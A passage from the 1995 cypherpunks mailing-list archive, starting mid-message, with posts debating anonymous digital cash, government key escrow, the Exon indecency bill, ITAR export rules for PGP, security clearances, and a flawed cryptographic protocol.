>off the mark.  And I'm sure that MTB is no more eager than we are to
>publicly dissect all the underlying cost structures, so I have no idea
>what the 50 cents that you cite really means.

The 50 cents actually comes from this week's InfoWorld, Bob Metcalfe's
column. I have know idea where he got the 50 cents, but he did say digital
cash, so i expect that he means MTB.

>To be perfectly clear:  our minimum service charge is 30 cents, not 5
>dollars.  If we didn't think it was worthwhile to take transactions that
>small, we wouldn't do so.

Fine. Are we including the cost of the credit card transaction to the
consumer? Fees, interest, that stuff? There are lots of hidden costs in a
book entry system. With a bearer-certificate system, the price is the
spread between the certificate's bid and asked prices for (a traveller's
check, for instance, is asked at a primium, and redeemed at face value, for
instance. That's all the cost of using them.)

>A true geodesic structure is self-supporting and self-structuring.  A
>cryptographic infrastructure can and should be similar, I agree
>completely.  However, a *monetary* infrastructure needs convertability,
>and the points of conversion are always the best targets of attack for
>criminals.  (I've been casting about for an analogy to physical
>geodesics, and it's hard to find one.  The best I can come up with is to
>imagine that in order to convert a carbon buckyball to a more
>conventional set of carbon molecules, you had to do it through a service
>bureau that was capable of error, fraud, or subversion by outside
>criminals.  This would ONLY matter if you ever wanted to do such
>conversions, but it would matter a lot then, especially if you had to
>suffer a serious financial loss if you got the wrong carbon molecules at
>the end of the process.)

Sometimes I feel like I'm beating this geodesic metaphor like a dead horse
sometimes... ;-).

>
>IF you wanted to settle for a totally non-convertible economy (like
>rubles in the old Soviet Union, or like the LETS system on the net
>today, as I understand it) then you could build it geodesically.

Really?

>  But if
>you want to be able to convert back and forth between Internet payment
>systems and non-Internet payment systems, it can never be truly
>geodesic.  It will always be attackable at the points of conversion.
>(You may "trade digital certificates", but how do you know the ones
>you're receiving were obtained for legitimate real-world value?)
>Because of this, the underwriting financial institutions, who have a
>very reasonable desire to limit their own risk, will inevitably seek the
>protection-by-traceability offered by something less than perfect
>anonymity.  We may not like it, but it's a very natural position to be
>taken by those who are actually bearing the financial risks at the point
>of conversion.

That may be true, Nathaniel, but just because the people who bring the
money off the net need to be identified to the digital cash underwriter's
(actually the underwriter's bank's) satisfaction, doesn't mean that the
trades on the net can't be totally anonymous. We've gone over this before.
Let's build a model to talk about this, and then you'll see what I mean.

Suppose I open an anonymous bank account with ATM card. Then, on the net, I
buy digital cash from a digital cash underwriter. The web-page reads my ATM
swipe and PIN, and then pumps it (without the underwriter being able to
read it) through to my bank, who says to the underwriter, "Yup, there's
money here, send it to him, and I'll wire it you (now/overnight/whatever)."
The digital cash underwriter then issues me my digital cash, and I put it
on my hard drive. I buy stuff on the net. I sell stuff on the net.
Sometimes I go online with the trade to check my buyers' cash, sometimes I
don't. Element of risk there, but this risk can be made accountable. It's
probably always going to be cheaper to do offline transactions, but there's
the possibility that when I cash in that money, it has been spent already.
Fair trade. It's probably quantifiable and thus can be dealt with. We won't
know till we have data.

Being an astute businessman (you can tell this is a model, right?), I end
up with positive cashflow. So, that money I don't invest with a portfolio
manager on the net by buying anonymous bearer certificates for his mutual
fund, ;-), I decide to take off of the net and buy Netscape puts, March
1996, $10.

So, I go to the underwriter's page (maybe I go to multiple underwriters'
pages, or maybe there's an enterprising third-party money changer who
honors all comers for a cut), and I cash out. I swipe my ATM and punch my
PIN, and my bank says to the underwriter "OK, I know that account, how much
are you sending me?", and the underwriter says how much, and how and when
the money would arrive (wire? Rollerblade messenger? bunch of militia types
in a purple Hummer?, anyway...). And there's money back off of the net.

In this model, there's no reason why I can't send an anonymous software
agent to buy stuff for me, why I can't buy anonymously or sell anonymously.

So, given that model, what's the problem?


Now, I've also been thinking about something else.

Wei Dai has been talking about how anonymity will always cost more, and
certainly, in the model above, there's a certain risk with doing off-line
transactions. You don't know if the cash in the transaction is
double-spent, like I said above, but that "special stuff" has to be done to
accomodate anonymity, which will always cost more.  I'll come back with a
whole blather on this next week when I get back from the CyberDog Kitchen
(I'm here, and Gromit says "hi"), but I think it comes from what the
default mechanism for commerce is going to be, threaded, audit-trailed
x.blabla or anarchic, geodesic, bearer-certificates. I bet you can guess
where I'm going to come down on this...

Cheers,
Bob Hettinga




-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 6 Dec 95 10:46:58 PST
To: cypherpunks@toad.com
Subject: Microsoft Internet Announcements Thursday, December 7, 1995
Message-ID: <Pine.ULT.3.91.951206103309.4575A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

"A day that will live in infamy."

Anyone have the exact time that Bill will begin speaking? I think it 
would be "neat" if we timed the release of a complete rewrite of the 
win95netbugs FAQ (with a new security section), improvements to the 
hackmsoft page, and other stuff for 15 minutes after Bill begins.

The win95netbugs FAQ, version 4.00.950, will be posted to the following
places tomorrow morning (I'll probably be up all night): 

http://www-leland.stanford.edu/~llurch/win95netbugs/faq.html
  [canon URL; multiple load-balancing SPARCServers]

http://www-dccs.stanford.edu/NetConsult/Win95Net/faq.html
  [use this if you have an old Sun DNS server that barfs on the 
   www-leland lbnamed tricks]

news.answers, comp.answers, comp.protocols.tcp-ip.ibmpc, and several
higher-traffic groups (this will be the first approved and rtfm-archived
posting; the news-answers folks got back to me last week). I'll probably
create the throwaway w95netbugs@aol.com for posting purposes. 

gopher://quixote.stanford.edu/1m/win95netbugs

An email autoresponder to be named later (finger this account in the 
morning).

An ezine or three to be named later.

- -rich

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMMXlBY3DXUbM57SdAQFnzwP/ZaFJsyz7H/uViPAetTiaBnLxvgZBFmiE
mURZdUHU7vVPZ1cIjdO2j0ARoulwQvzXUywezTHusIBGgbxdMf0/NpErpAbFktvA
/A7uBGo38scSaYIATLpMEMx8aomoeDiwRxUyzXTCAaRnBHfHf0l0/egDUYPWnK3D
ZTF1cFzv+jA=
=cHCp
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Wed, 6 Dec 95 07:49:04 PST
To: Peter Trei <trei@process.com>
Subject: re: NIST GAK export meeting, sv
In-Reply-To: <9512061445.AA14166@toad.com>
Message-ID: <Pine.SOL.3.91.951206104808.1606C-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 6 Dec 1995, Peter Trei wrote:

> "Hieronymous" says:
> >       (Thanks for the summary, Pat.)
> >       This last bit is really rich. I can't think of a single publically
> > defensible reason for the stipulation that every escrow agent must employ
> > someone with SECRET clearance, but I *can* think of a publically
> > indefensible reason for it -- to facilitate those spooky non-court wiretap
> > authorizations that've been alluded to in the fine print of the GAK
> > proposals.
> 
> This is probably one reason. Another is that they could shut down an
> escrow agent at a moment's notice by pulling the clearances. We
> haven't seen the other requirements, but an interesting question is
> what happens when an escrow agent goes out of business.


Firearms dealers are requred to keep records of purchases.  In theory 
(and by law) they don't pass these records along to the authorities 
except in response to specific inquiries.

However, in the last couple of years there have been numerous reports of 
mass copying of records by BATF or surrogates (specifics on request).

And when a firearms dealer goes out of business, all records go to the BATF.

So there is something of a precedent.

Brad

> 
> Speaking for myself....
> 
>  
> 
> Peter Trei
> Senior Software Engineer
> Purveyor Development Team                                
> Process Software Corporation
> http://www.process.com
> trei@process.com
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 6 Dec 95 09:33:21 PST
To: cypherpunks@toad.com
Subject: News on Congressional Debate on Exon
Message-ID: <aceb12f4150210045ba8@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I just heard (12:15 EST) that the House has adopted language similar to the
original Exon-Coates language in the Senate (as opposed to the White
language, which was less restrictive in that it dealt with material that
was "harmful" to children, interpreted to mean child porn).

It looks like Internet Service Providers will soon be held liable for
"indecent material" passed by their systems. I would expect most ISPs will
drop the alt.binaries.* newsgroups as a first step, and maybe other groups
as well.

(Controlling Web page accesses is a much tougher problem, of course. so I
wouldn't expect much action on this at first.)

By the way, I recently discovered a new twist on "age credentials": the use
of credit cards to prove age. One image site is asking for a "valid credit
card number" to be given...not to use for charges, but just to do a quick
verification (they claim a few minutes or less) that the card is valid and
in the name of the person accessing their site.

Some obvious security issue. An interesting twist, though.

If the Exon Bill really does go into effect, and age limits on access are
imposed, I'll be looking for what we've always joked about: the
"Information Superhighway Driver's License."

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Wed, 6 Dec 95 11:44:11 PST
To: Nathaniel Borenstein <nsb+limbo@nsb.fv.com>
Subject: Re: Geodesic Payment Systems? (was Re: Meeting notes from ANSI X.9 Meeting on Electronic Payment)
In-Reply-To: <wklMcgyMc50eEbskld@nsb.fv.com>
Message-ID: <Pine.SUN.3.91.951206104553.24528A-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 6 Dec 1995, Nathaniel Borenstein wrote:

> I had assumed that there was a market discount, but it's still not quite
> that simple.  It's very hard for markets to deal with *unbounded* risk. 
> The biggest problem I see with most of the crypto-cash schemes is that
> there is a legitimate scenario -- however low-probability you might
> assess it to be -- of break-the-bank catastrophic failure, i.e. in which
> someone gains the keys that allow him to essentially print money.  This
> kind of low-probability, infinite-cost risk is the kind of thing that
> gives underwriters the heebie jeebies.  There's a good reason that most
> companies have "Ltd" after their name instead of "Unlimited", in those
> countries where that's the naming convention.

I find this argument totally unconvincing.  No risk is unbounded.  The 
worst thing that can possibly happen is that a nearby star goes supernova 
and completely destroys the earth.  Yet markets handle this 
low-probability risk quite well.

The direct cost of a break-the-bank catastrophic failure is bounded by the 
amount of capital the bank has.  This is because the market will not 
accept more liabilities (real or forged) from the bank than its capital.  
There may be other indirect costs resulting from dislocations, but these 
should also be proportional to the size of the bank.  Therefore your 
argument is really against centralization and for diversification and 
distribution.

Wei Dai





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robbie Gates <gates_r@maths.su.oz.au>
Date: Tue, 5 Dec 95 16:03:36 PST
To: solman@MIT.EDU
Subject: Re: Secure versus ?
In-Reply-To: <9512051652.AA17214@ua.MIT.EDU>
Message-ID: <30C4DED5.15FB@maths.su.oz.au>
MIME-Version: 1.0
Content-Type: text/plain


solman@MIT.EDU wrote:
> Alice wants to use the inner loop to send bit b.
> 1. Alice randomly chooses seven bits of salt, and prepends b to them
>    creating an 8 bit M
> 2. Alice randomly chooses an (Na,Ea) pair from the list of possibilities.
> 3. Alice calculates D such that E*D mod (N-1) equals 1
> 4. Bob randomly chooses an (Nb,Eb) pair from the list of possibilities.
> 5. Bob calculates D
> 6. Alice sends Bob the nine bit number (M^Ea) mod Na = C1
> 7. Bob sends Alice (C1^Eb) mod Nb = C2
> 8. Alice sends Bob (C2^Da) mod Na = C3
> 9. Bob calculates (C3^Db) mod Nb = M, the bit being the MSB.

i don't think the maths works here ... let
Na = 257, Ea = 13, Da = 197, Nb = 263, 
Eb = 11, Db = 143

choosing M = 2, i calculate
C1 = 225, C2 = 144, C3 = 205, C4 = 33 != M
(and bottom bit is different)
choosing M = 7, i get
C1 = 127, C2 = 53, C3 = 19, C4 = 139 != M
(and top bit is different)

so your channel doesn't get the bit from alice to bob ...

the problem is that you are mixing reduction modulo two different numbers
Na and Nb ... this screws up the powering law you are trying to use.

 - robbie
-- 
----------------------------------------------------------------------
      robbie gates      | it's not a religion, it's just a technique.
  apprentice algebraist |    it's just a way of making you speak.
    pgp key available   |       - "destination", the church.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 6 Dec 95 08:13:47 PST
To: tcmay@got.net (Timothy C. May)
Subject: Re: The "Future" Fallacy
In-Reply-To: <acea8b9b110210048f27@[205.199.118.202]>
Message-ID: <199512061614.LAA12637@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Duncan's comment was quite obvious. Any child old enough to use a
computer can already transmit coded messages that no government can
find easy to decipher. The "Future Fallacy" is the prediction of
things in the past.

Timothy C. May writes:
> >From: Duncan Frissell
> >Bill Gates (like Mister Newt before him) committed what I call the Future
> >Fallacy in "The Road Ahead."  Page 106.
> >
> >"Soon any child old enough to use a computer will be able to transmit coded
> >messages that no government on earth will find easy to decipher."
> >...................................................
> >
> >Billg is an optimist.
> >What's wrong with this picture, Duncan?
> 
> I found nothing wrong or incorrect with the quote Duncan attributed to Bill
> Gates (I haven't read Gates' book).
> 
> I couldn't understand Duncan's koan, shrugged, and moved on.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 6 Dec 95 11:17:56 PST
To: cypherpunks@toad.com
Subject: Re: ERA_sur
In-Reply-To: <199512061429.JAA08877@pipe4.nyc.pipeline.com>
Message-ID: <Pine.ULT.3.91.951206111709.4575K-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 6 Dec 1995, John Young wrote:

>    There's implicit boost for encryption in the controversial
>    "undeleting" of personal files on Jean Lewis's floppy,
>    subpoenaed by Whitewater investigators.
> 
>    Peter Wayner has a thread about it on Cyberia-L.

I'd say this is relevant, and a good article.

It was also in yesterday's San Jose Mercury News, which is available on
America "On Line" and other places. Might be on www.sjmercury.com.

[Where] is Cyberia-L archived?

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tien@well.sf.ca.us (Lee Tien)
Date: Wed, 6 Dec 95 11:25:11 PST
To: cypherpunks@toad.com
Subject: Re: GAK Flap Happening at a Good Time--Journalists Read!
Message-ID: <199512061926.LAA25326@well.com>
MIME-Version: 1.0
Content-Type: text/plain


Sameer wrote:

        There was no Netscape (or RSADSI, for that matter [an RSADSI
employee showed up, but it was on his own time]) representative at the
recent Bernstein hearing in SF. I think that shows how much they
really care.

Actually, this is not entirely correct.  An attorney for a firm which is
outside counsel (crypto-related) to Netscape did attend the Bernstein
hearing.  

Lee Tien






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tien@well.sf.ca.us (Lee Tien)
Date: Wed, 6 Dec 95 11:25:22 PST
To: cypherpunks@toad.com
Subject: Re: Use of PGP as an export?
Message-ID: <199512061926.LAA25435@well.com>
MIME-Version: 1.0
Content-Type: text/plain


Actually, the ITAR contains specific provisions for "defense services," and
it is possible to "export" "defense services."  

Lee Tien

From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 02 Dec 1995 19:24:24 -0800
Subject: Re: Use of PGP as an export?

At 09:09 PM 12/2/95 -0800, Ted Cabeen <cabeen@netcom.com> wrote:
>I think this has been brought up before, but I could only find one reference
>to it in the archives and it wasn't too helpful, so I'll ask again.  If a
>university provided a copy of PGP for use on their unix machines and a
>non-resident, non-citizen *used* the copy of PGP on the server, but did not
>download it onto their own machine, but instead just ran PGP on the server
>alone, would it be a violation of the ITAR?  My school is interested in
>putting a copy of PGP on the university server and wants to know if they
>should somehow restrict access to citizens and legal residents only.  Thanks.

That's not giving technical data to the foreigner, that's providing a service;
the ITAR doesn't seem to restrict that.  It's not an especially secure way to
operate, but that's an inherent problem with multi-user systems or file servers.
One way to implement it that would be only mildly insecure would be to put PGP
on a file server, with execute-only permissions; users of client machines
still could be attacked by somebody faking out NFS, but they wouldn't have
to send their passphrases across the net the way they would in a telnet session.
#--
#                               Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281

Lee Tien
Attorney
tien@well.sf.ca.us
(510) 525-0817 voice
(510) 525-3015 fax






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jason Burrell <jburrell@crl.com>
Date: Wed, 6 Dec 95 11:30:36 PST
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: News on Congressional Debate on Exon
In-Reply-To: <aceb12f4150210045ba8@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.951206112559.20969B-100000@crl12.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 6 Dec 1995, Timothy C. May wrote:

> 
> I just heard (12:15 EST) that the House has adopted language similar to the
> original Exon-Coates language in the Senate (as opposed to the White
> language, which was less restrictive in that it dealt with material that
> was "harmful" to children, interpreted to mean child porn).
> 
> It looks like Internet Service Providers will soon be held liable for
> "indecent material" passed by their systems. I would expect most ISPs will
> drop the alt.binaries.* newsgroups as a first step, and maybe other groups
> as well.

*Sigh*. Are we really ready to go back to UUCP? It looks like we'll have
to. That is, if someone doesn't set up a couple cryptographically enhanced
subnets first, or come up with some better idea. Interesting prospect,
actually. 

Anyone wish to comment on the prospect of a double blind server, set
outside U.S. borders, that can act as an interface to the rest of the
world, perhaps encrypting or stego'ing the data transfered between it and
the user? Basically, an anonymous remailer that acts as a cross between 
an NNTP, POP3, and SMTP servers.

> If the Exon Bill really does go into effect, and age limits on access are
> imposed, I'll be looking for what we've always joked about: the
> "Information Superhighway Driver's License."

God help us all.

--
Jason Burrell
South Texas Communications




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Wed, 6 Dec 95 08:28:21 PST
To: greg@ideath.goldenbear.com (Greg Broiles)
Subject: Re: Why Netscape employees should not leave
In-Reply-To: <199512040002.AA08103@ideath.goldenbear.com>
Message-ID: <199512061633.LAA29559@homeport.org>
MIME-Version: 1.0
Content-Type: text


	I think that this logic (below) is off.  GAK is evil.  Pure
and simple.  If the market wants CKE/optional escrow for business
thats one thing.  The recent NIST meeting has shown that any system
promulgated by the government will force on us a system with excessive
kowtowing to the 'interests of law enforcement.'

	If people want CKE, and I think they do, then the government
will get 90% of what it gets with GAK, with none of the fight.  Most
companies will happily turn over keys at the flash of a badge, never
mind a warrant.  (Was it Doug Barnes who pointed out that spying is
more exciting than banking?)  If it was easy, I'd probably have backup
escrowed copies of my secret keyring.  In Lichtenstien.

	This leaves us to ask, why GAK is such a big deal at NIST, if
CKE will get them most of what they want?  First, they haven't
realized that CKE is most of what they want.  Second, they're worried
about the extra 10%.  Drug dealers and terrorists not using it.  (This
points towords an eventual mandate for GAK, even if it starts out
voluntary.  Many have noted this.)  Third, they've invested so much
energy in the fight for GAK that they're emotionally tied to the idea,
and they can't say 'well this would be almost as good.'


Adam

| The last sentence seems backwards to me - mandatory GAK is the real evil, not
| non-mandatory GAK. (non-mandatory GAK is just a special case of voluntary
| key escrow, where some of us might choose to escrow to /dev/null, some to
| their attorney, some to a friend, and some to freeh@fbi.gov.) Non-mandatory
| GAK makes me nervous, because it seems susceptible to back-door coercion
| ("Dear Citizen: We notice that you've turned off GAK. Don't you trust us?
| Please write back and tell us why you're no longer letting us have access
| to your net traffic. Do you have something to hide?") but mandatory GAK
| is the worst-case scenario being implemented immediately.
| 


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 6 Dec 95 10:22:52 PST
To: Ernest Hua <jimbell@pacifier.com (jim bell)
Subject: Re: Solution for US/Foreign Software?
Message-ID: <aceb1fcf1602100460f2@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:50 PM 12/6/95, Ernest Hua wrote:

>The main point is that there is no such thing as the "letter of the law".
>What they enforce is much broader than that, and how they enforce it is much
>more subtle than clear-cut criminal prosecution.  Therefore, you cannot just
>use literal loop holes just because it's not clear, because the law they are
>enforcing is not clear either.
>
>This response should almost be an FAQ for this crowd.

Indeed. In fact, my Cyphernomicon FAQ contains numerous discussions about
ITAR and hooks. For example:

  - Dan Bernstein has argued that ITAR covers nearly all
              aspects of exporting crypto material, including codes,
              documentation, and even "knowledge." (Controversially, it
              may be in violation of ITAR for knowledgeable crypto people
              to even leave the country with the intention of developing
              crypto tools overseas.)

and

 10.10.6. "Can ITAR and other export laws be bypassed or skirted by
            doing development offshore and then _importing_ strong crypto
            into the U.S.?"
           - IBM is reportedly doing just this: developing strong crypto
              products for OS/2 at its overseas labs, thus skirting the
              export laws (which have weakened the keys to some of their
              network security products to the 40 bits that are allowed).
           + Some problems:
             - can't send docs and knowhow to offshore facilities (some
                obvious enforcement problems, but this is how the law
                reads)
             - may not even be able to transfer knowledgeable people to
                offshore facilities, if the chief intent is to then have
                them develop crypto products offshore (some deep
                Constitutional issues, I would think...some shades of how
                the U.S.S.R. justified denying departure visas for
                "needed" workers)
           - As with so many cases invovling crypto, there are no
              defining legal cases that I am aware of.


--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 6 Dec 95 08:46:39 PST
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: No More Netscape Comments from Me
In-Reply-To: <v02120d10aceb5449cdea@[199.0.65.105]>
Message-ID: <199512061647.LAA12675@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Robert Hettinga writes:
> >So, have fun riding the Great Internet Bubble of 1995!
> 
> Yeah... I wonder what the price of Netscape puts around, say, March are
> these days...

No conventional options are available on Netscape yet. The price on
custom options is high, and you have to trade a very large (quarter to
half million dollar) sum in order to get them.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SBinkley@atitech.ca (Scott Binkley)
Date: Wed, 6 Dec 95 08:57:33 PST
To: cypherpunks%toad.com@genie_1
Subject: GAK
In-Reply-To: <6615943A02502C79@-SMF->
Message-ID: <6615943A01502C79@-SMF->
MIME-Version: 1.0
Content-Type: text/plain


I heard a while back about being able to "split" up a PGP key.  What 
about
splitting up the key into many parts, and giving them out to multiple 
INDEPENDANT
agencies.  ie: One piece goes to the FBI, one to the NSA, one to some 
other committee, and
so on.  That way, no goverment body could just tap your conversations 
without getting
approval from others, and gaining the pieces of your key.

just a thought




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Charles Graves <llurch@networking.stanford.edu>
Date: Wed, 6 Dec 95 11:56:32 PST
To: cypherpunks@toad.com
Subject: Note on "Barring Netscape"
Message-ID: <199512061957.LAA05418@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


The Microsoft Internet Explorer sends the user-agent "Mozilla 1.22 (compatible"
to hte server, which triggers an incorrect response from, e.g., www.c2.org.
This little fraud has the potential to make you look silly if left unexplained.

If you get the string "compatible;" (or Compatible;?), you should instead pop
up Netscapisms that show that Microsoft is lying. Or maybe Billisms.
<font face="Symbol">, which affects only MSIE, might be appropriate.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Wed, 6 Dec 95 09:02:06 PST
To: cypherpunks@toad.com
Subject: re: Secret Clearance
Message-ID: <v02130506aceb035d409b@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 21:00 12/5/95, Pete Loshin wrote:

>>From working at an organization that did a lot of government work,
>my understanding of the process of clearing employees is this:
>
>-certain tasks require knowledge or access that must be restricted
>-you have to have a high degree of trust in the people doing those tasks
>-people with money troubles, out-of-control addictions, skeletons in the
> closet, and histories of "troubles" are prime targets for subversion
>-doing a clearance check (in theory) eliminates the possibility that
> these people will be blackmailed/bribed into revealing their secrets

The problem is that they are subject to blackmailed/bribed/subversion ONLY
because the employer will use the info as an excuse for firing/restricting
the employee. If someone has a "skeleton in the closet" such as being gay,
so long as the employer does not discrimate against gays who INFORM the
employer of their sexual orientation or if the employer does not care about
the person being gay (ie: removes it a potential blackmail threat) there is
no problem so far as I can see. It is only when there is something that is
WORK RELATED which would affect the person's performance if not known that
the question of a background check is relevant.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Wed, 6 Dec 95 10:28:35 PST
To: "Robert A. Rosenberg" <hal9001@panix.com>
Subject: re: Secret Clearance
In-Reply-To: <v02130506aceb035d409b@[166.84.254.3]>
Message-ID: <Pine.SUN.3.91.951206122514.21618A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 6 Dec 1995, Robert A. Rosenberg wrote:

> The problem is that they are subject to blackmailed/bribed/subversion ONLY
> because the employer will use the info as an excuse for firing/restricting
> the employee. If someone has a "skeleton in the closet" such as being gay,
> so long as the employer does not discrimate against gays who INFORM the
> employer of their sexual orientation or if the employer does not care about
> the person being gay (ie: removes it a potential blackmail threat) there is
> no problem so far as I can see. It is only when there is something that is
> WORK RELATED which would affect the person's performance if not known that
> the question of a background check is relevant.

	Thats not compleately true. He may not care that his employer know
that he is gay, but he would not anything for say his old mother and father
not to know. You cant never be sure about what people *really* care about.

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 6 Dec 95 11:08:46 PST
To: jimbell@pacifier.com (jim bell)
Subject: Re: Solution for US/Foreign Software?
Message-ID: <aceb2a8d1b021004e6f8@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:21 PM 12/6/95, jim bell wrote:

>NO!  You didn't read my commentary carefully enough.   These "hooks" (your
>words) will, in effect, already be connected to encryption software weak
>enough to make NSA happy.  You know, 40 bit keys or something like that.
>But instead of being in one large file, embedded into a program, it'll be
>TWO files.  Simple programming change.  Everything that
>implements/defines/limits the encryption to 40 bits will be in the smaller
>file.
>This really isn't a "hook," it's an internal connection between two
>portions of the same program. (actually, it wouldn't need to be in two
>separate files; a file which implements a patch for the first file would
>work great.)
>
>It'll be exportable, because its key size is "acceptable."  At the time
>the export license is requested, the replacement module to increase key
>size probably won't even  exist, in order to avoid giving the USG an
>excuse to deny the export license.   After the license is obtained, the
>replacement module is written and shipped to domestic users.
>
>I fully realize the USG won't "like" this kind of thing.  But if they are
>trying to take the position that certain kinds of encryption software CAN
>be exported, and some can't, they're going to have to approve SOME
>programs for export, using criteria which at least pretend to be
>objective.

Yes, I read your proposal. The "hooks" term is not my coinage, but refers
to this general idea. I urge you to read what others, including companies,
have had to say on this matter. Much of the debate on "interoperability"
revolves around details of entry points to crypto modules and such hooks.

No point in arguing with Jim on this anymore, so I won't.

Good luck, Jim, in introducing such a product.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Daniel 'genius' Charpentier" <drcharpe@hamlet.uncg.edu>
Date: Wed, 6 Dec 95 10:07:47 PST
To: cypherpunks <cypherpunks@toad.com>
Subject: PGP
Message-ID: <Pine.SOL.3.91.951206125002.25551A-100000@hamlet>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----



   I've tried to find out the answers to my
questions myself but I haven't been very successful.
Actually, I haven't been successful at all.  First of all,
I've been using PGP on my computer but when I tried to port it
over to my unix account it didn't work.  I took the source code
and tried to compile it using the unix g++ compiler but it gave
me all of these errors.  Where can I find PGP that is already
compiled for unix or at the very least will compile for unix?
Secondly, if I create a program that makes using PGP more
user friendly can I let other people have it ( for FREE )?
Lastly, what is considered overkill with cryptography?
I don't believe anything is.  My programs accept what the user
inputs for how large prime numbers should be ( my public
key programs ) but I make them able to accept values that go
up to 30720 bits ( I don't believe a number can ever be large
enough ).  You can never be to safe...never.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMMXVhDMGe42brZbVAQEo/Qf7BSshqKJAmxVzyGSyAp2Qkj+/dqh1Zon1
xDqMnvU6ihLimHZ/uXGiQE2jM6N8FRbYu7psQ/iPJ+gX5/VKfrxlxjCfDM0Jx2s9
vucgMQz1KYbELA8Fo1QUEsDuTMzJ80VoTicXfZZmILhr7cBJH4pHa5RgkgrS2Lun
iodQ+F7BXdio86TnctQgoKJ+78qOYDuV4Vfha/a290ZoZmPRcqArYv7tU6X3KMjf
DGxqgugiwpHnkTO1B9wypoePbbJZSNzFYYvZKMI8Ntg7yFkMl/lSxcLh6oYq0ACe
R9NfZR9x11H/fIrn8HZlq0Q86OptWhZz53p77VNN+sVZJOktHJIWqg==
=WK6x
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
